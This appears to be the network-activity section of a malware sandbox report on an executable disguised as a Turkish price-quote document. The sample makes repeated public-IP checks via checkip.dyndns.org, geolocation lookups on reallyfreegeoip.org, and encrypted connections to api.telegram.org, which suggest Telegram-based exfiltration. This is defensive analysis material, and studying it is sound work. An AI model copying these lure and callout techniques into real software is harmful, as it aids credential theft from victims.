                                                                                                    Jan 9, 2025 19:09:43.067905903 CET4974680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:43.067972898 CET4974680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:43.072735071 CET8049746132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:43.811100006 CET8049746132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:43.812216997 CET49750443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:43.812316895 CET44349750104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:43.812398911 CET49750443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:43.812624931 CET49750443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:43.812660933 CET44349750104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:43.865412951 CET4974680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:44.289109945 CET44349750104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:44.290586948 CET49750443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:44.290669918 CET44349750104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:44.445272923 CET44349750104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:44.445431948 CET44349750104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:44.445486069 CET49750443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:44.446474075 CET49750443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:44.450038910 CET4974680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:44.451242924 CET4975580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:44.455425024 CET8049746132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:44.455471039 CET4974680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:44.456088066 CET8049755132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:44.456163883 CET4975580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:44.456285954 CET4975580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:44.461055040 CET8049755132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.129782915 CET8049755132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.176938057 CET49759443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:45.176985979 CET44349759104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.177040100 CET49759443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:45.177308083 CET49759443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:45.177321911 CET44349759104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.177951097 CET4975580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:45.673727989 CET44349759104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.705751896 CET49759443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:45.705787897 CET44349759104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.818531990 CET44349759104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.818706036 CET44349759104.21.64.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.818764925 CET49759443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:45.819071054 CET49759443192.168.2.7104.21.64.1
                                                                                                    Jan 9, 2025 19:09:45.993241072 CET4975580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:45.998178005 CET8049755132.226.247.73192.168.2.7
                                                                                                    Jan 9, 2025 19:09:45.998244047 CET4975580192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:46.112876892 CET49760443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:46.112924099 CET44349760149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:46.112991095 CET49760443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:46.113841057 CET49760443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:46.113856077 CET44349760149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:46.842878103 CET44349760149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:46.842989922 CET49760443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:46.844953060 CET49760443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:46.844960928 CET44349760149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:46.845208883 CET44349760149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:46.846945047 CET49760443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:46.891338110 CET44349760149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:47.103867054 CET44349760149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:47.103933096 CET44349760149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:47.105050087 CET49760443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:47.109106064 CET49760443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:53.815284014 CET4970680192.168.2.7132.226.247.73
                                                                                                    Jan 9, 2025 19:09:54.246659040 CET49808443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:54.246725082 CET44349808149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:54.246805906 CET49808443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:54.247077942 CET49808443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:54.247088909 CET44349808149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:54.875685930 CET44349808149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:54.886360884 CET49808443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:54.886399984 CET44349808149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:54.886482000 CET49808443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:54.886497974 CET44349808149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:55.314321995 CET44349808149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:55.314548969 CET44349808149.154.167.220192.168.2.7
                                                                                                    Jan 9, 2025 19:09:55.314668894 CET49808443192.168.2.7149.154.167.220
                                                                                                    Jan 9, 2025 19:09:55.314929962 CET49808443192.168.2.7149.154.167.220

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 9, 2025 19:09:33.151596069 CET5973553192.168.2.71.1.1.1
                                                                                                    Jan 9, 2025 19:09:33.159181118 CET53597351.1.1.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:34.145709038 CET5753553192.168.2.71.1.1.1
                                                                                                    Jan 9, 2025 19:09:34.155899048 CET53575351.1.1.1192.168.2.7
                                                                                                    Jan 9, 2025 19:09:46.104617119 CET5899453192.168.2.71.1.1.1
                                                                                                    Jan 9, 2025 19:09:46.111681938 CET53589941.1.1.1192.168.2.7

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 9, 2025 19:09:33.151596069 CET192.168.2.71.1.1.10xcbc9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:34.145709038 CET192.168.2.71.1.1.10xd711Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:46.104617119 CET192.168.2.71.1.1.10xf59dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 9, 2025 19:09:33.159181118 CET1.1.1.1192.168.2.70xcbc9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:33.159181118 CET1.1.1.1192.168.2.70xcbc9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:33.159181118 CET1.1.1.1192.168.2.70xcbc9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:33.159181118 CET1.1.1.1192.168.2.70xcbc9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:33.159181118 CET1.1.1.1192.168.2.70xcbc9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:33.159181118 CET1.1.1.1192.168.2.70xcbc9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:34.155899048 CET1.1.1.1192.168.2.70xd711No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:34.155899048 CET1.1.1.1192.168.2.70xd711No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:34.155899048 CET1.1.1.1192.168.2.70xd711No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:34.155899048 CET1.1.1.1192.168.2.70xd711No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:34.155899048 CET1.1.1.1192.168.2.70xd711No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:34.155899048 CET1.1.1.1192.168.2.70xd711No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:34.155899048 CET1.1.1.1192.168.2.70xd711No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                    Jan 9, 2025 19:09:46.111681938 CET1.1.1.1192.168.2.70xf59dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • reallyfreegeoip.org
                                                                                                    • api.telegram.org
                                                                                                    • checkip.dyndns.org

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.749702132.226.247.73802020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 9, 2025 19:09:33.171355963 CET151OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 9, 2025 19:09:33.873567104 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:33 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                    Jan 9, 2025 19:09:33.883658886 CET127OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Jan 9, 2025 19:09:34.100465059 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:33 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                    Jan 9, 2025 19:09:34.860151052 CET127OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Jan 9, 2025 19:09:35.103996992 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:34 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.749706132.226.247.73802020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 9, 2025 19:09:35.790402889 CET127OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Jan 9, 2025 19:09:36.584702015 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:36 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.749710132.226.247.73802020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 9, 2025 19:09:37.218221903 CET151OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 9, 2025 19:09:37.942362070 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:37 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.749718132.226.247.73802020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 9, 2025 19:09:38.625767946 CET151OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 9, 2025 19:09:39.324439049 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:39 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.749725132.226.247.73802020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 9, 2025 19:09:39.984846115 CET151OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 9, 2025 19:09:40.677221060 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:40 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.749737132.226.247.73802020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 9, 2025 19:09:41.319233894 CET151OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 9, 2025 19:09:42.071578979 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:41 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.749746132.226.247.73802020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 9, 2025 19:09:43.067972898 CET151OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 9, 2025 19:09:43.811100006 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:43 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.749755132.226.247.73802020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 9, 2025 19:09:44.456285954 CET151OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 9, 2025 19:09:45.129782915 CET273INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:45 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.749704104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-09 18:09:34 UTC853INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:34 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760963
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSMh3qXSQEZZJKiEnjcAEBh9tUieZ8thLdV8O5ue7Jd48Csq2OEu7vgp3l8ro8Y3J15Ye%2F78MHg8Z5q0sMPdRwfKMAQCN%2Ff1v8vYkI3WkBk6d734ANvbvpTMwHlfo78z2WH5k319"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff661106baede95-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1646&rtt_var=640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1678160&cwnd=242&unsent_bytes=0&cid=6231ec6cd8b34219&ts=222&x=0"
                                                                                                    2025-01-09 18:09:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.749705104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:35 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    2025-01-09 18:09:35 UTC865INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:35 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760964
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
